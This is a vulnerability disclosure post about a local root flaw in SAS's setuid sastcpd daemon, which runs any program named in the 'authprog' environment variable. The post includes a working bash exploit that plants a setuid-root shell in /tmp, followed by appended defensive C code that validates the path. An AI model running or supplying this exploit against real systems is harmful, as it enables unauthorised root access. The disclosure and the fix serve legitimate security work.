sastcpd 8.0 'authprog' local root vulnerability

Hi,

Several environment variable problems exist in the 'SAS Job Spawner for Open Systems version 8.00'. No other releases of the software were available to test. Sorry.

authprog vulnerability
----------------------

The daemon passes a user-defined environment variable, 'authprog', to execve(). This obviously is a problem if sastcpd is setuid. A sample 'exploit' is attached.

netencralg vulnerability
------------------------

I haven't poked at this long enough to determine whether or not it is exploitable. sastcpd segfaults if 'netencralg' is set to any value.

All tests were run on SunOS 5.8.
Both vulnerabilities were discovered with Dave Aitel's/AtStake simple-yet-sexy sharefuzz 1.0.

cheers,
--rpc
#!/bin/bash
# sastcpd 8.0 'authprog' vulnerability.
# rpc <rpc@unholy.net> || <h@ckz.org>
# Thanks sharefuzz!

cat <<EOT >/tmp/hesh.c
int
main(void)
{
	setuid(0);
	setgid(0);
	execl("/bin/ksh", "ksh", (char *)0);
}
EOT

cat <<EOT >/tmp/heh.c
int
main(void)
{
	setuid(0);
	setgid(0);
	system("chown 0:0 /tmp/hesh");
	system("chmod 4755 /tmp/hesh");
	return 0;
}
EOT

gcc -o /tmp/heh /tmp/heh.c
gcc -o /tmp/hesh /tmp/hesh.c

export authprog=/tmp/heh
/path/to/sas/utilities/bin/sastcpd

sleep 1
rm /tmp/he*.c
rm /tmp/heh
/tmp/hesh
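Added defensive example, not part of rpc's post or of SAS's code: the pattern a setuid daemon should follow instead of handing an environment-supplied program path straight to execve(). The install directory, the policy checks and the function names are assumptions for illustration.

```c
/* Validate a caller-supplied helper path before a privileged process runs it.
 * Policy (assumed): absolute path under ALLOWED_DIR, no ".." or "." traversal,
 * root-owned regular file not writable by group or others, and a scrubbed
 * environment for the child. Fail closed on any doubt. */
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define ALLOWED_DIR "/opt/sas/utilities/bin/"   /* assumed install location */

/* Pure string policy: absolute, inside ALLOWED_DIR, no traversal components. */
int authprog_path_ok(const char *p) {
    if (p == NULL || p[0] != '/') return 0;
    if (strncmp(p, ALLOWED_DIR, strlen(ALLOWED_DIR)) != 0) return 0;
    if (strstr(p, "/../") != NULL || strstr(p, "/./") != NULL) return 0;
    size_t n = strlen(p);
    if (n >= 3 && strcmp(p + n - 3, "/..") == 0) return 0;
    return 1;
}

/* Filesystem policy: regular file, owned by root, not group/world writable. */
int authprog_file_ok(const char *p) {
    struct stat st;
    if (p == NULL || stat(p, &st) != 0) return 0;
    if (!S_ISREG(st.st_mode)) return 0;
    if (st.st_uid != 0) return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH)) return 0;
    return 1;
}

/* What the daemon should do instead of execve(getenv("authprog"), ...):
 * validate, then exec the helper with a fixed, minimal environment.
 * Returns -1 when the path is refused or the exec fails. */
int run_authprog(const char *candidate) {
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    char *const argv[] = { "authprog", NULL };
    if (!authprog_path_ok(candidate) || !authprog_file_ok(candidate)) {
        fprintf(stderr, "refusing authprog=%s\n", candidate ? candidate : "(null)");
        return -1;
    }
    execve(candidate, argv, clean_env);   /* only returns on failure */
    return -1;
}

int main(void) {
    /* Constructed input: the value the advisory's script exports. */
    return run_authprog("/tmp/heh") == -1 ? 0 : 1;
}
```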
